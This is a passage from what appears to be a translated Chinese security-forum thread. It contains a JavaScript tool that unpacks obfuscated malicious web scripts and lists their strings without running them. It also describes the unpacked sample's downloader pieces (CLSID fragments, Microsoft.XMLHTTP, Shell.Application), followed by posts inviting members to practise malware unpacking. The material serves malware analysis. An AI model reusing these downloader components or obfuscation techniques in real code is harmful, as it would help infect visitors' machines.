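  const count = Number(m[3]);
  const words = m[4].split('|');
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const key = encodeIndex(i, radix);
    dict.set(key, words[i] || key);             // empty slot: the token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// List the string literals of the unpacked code so the pieces (ProgID and CLSID
// fragments, file names, a URL) can be read without running anything.
function stringLiterals(js) {
  return (js.match(/"[^"]*"|'[^']*'/g) || []).map((s) => s.slice(1, -1)).filter(Boolean);
}

const unpacked = unpackPacker(PACKED_SAMPLE);
console.log(unpacked.split(';').join(';\n'));
console.log(stringLiterals(unpacked));
```

The output is the same statement list the alert box shows, one declaration per line: variables built up from "clsid:" plus the split CLSID fragments, "Microsoft.X"+"M"+"L"+... and "Shell."+"Application", with nothing from the sample executed.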

蓝核
OP | Posted 2013-4-20 22:46:48
This post was last edited by 蓝核 on 2013-4-20 23:48



Advertisement time
All talk and no practice is fake kung fu. Dear fellow Kafan members, why not give the malicious-site section a try? Bring your little sandbox and go spot the difference~~

As long as you unpack it correctly, you get points. At least 10 to start; if you've manually tackled the obfuscated kind, don't be shy, post your method and the experience points won't be low.

If you can't unpack it but post the malicious gibberish, we'll definitely give you a little something too.

If you're really good, we'll consider bringing you into the gang~~~~

But if you don't go play in the web-trojan section... then...
ljp2993
Posted 2013-4-20 23:00:43
Pure support... I'm running naked (no antivirus) again right now... don't dare go to the web-trojan section...
蓝核
OP | Posted 2013-4-20 23:08:30
ljp2993 posted on 2013-4-20 23:00:
Pure support... I'm running naked (no antivirus) again right now... don't dare go to the web-trojan section...

Then just calmly stay out of the samples section~~
ljp2993
Posted 2013-4-20 23:09:20
蓝核 posted on 2013-4-20 23:08:
Then just calmly stay out of the samples section~~

That's hard to control...
HearFish
Posted 2013-4-20 23:10:19
Finished writing? I'm wondering how much the article fee should be.
蓝核
OP | Posted 2013-4-20 23:13:16
HearFish posted on 2013-4-20 23:10:
Finished writing? I'm wondering how much the article fee should be.

This one's finished~
234447327
Posted 2013-4-20 23:29:00
I haven't slept for a day and a night, and the moment I saw this big pile of code my brain turned to mush.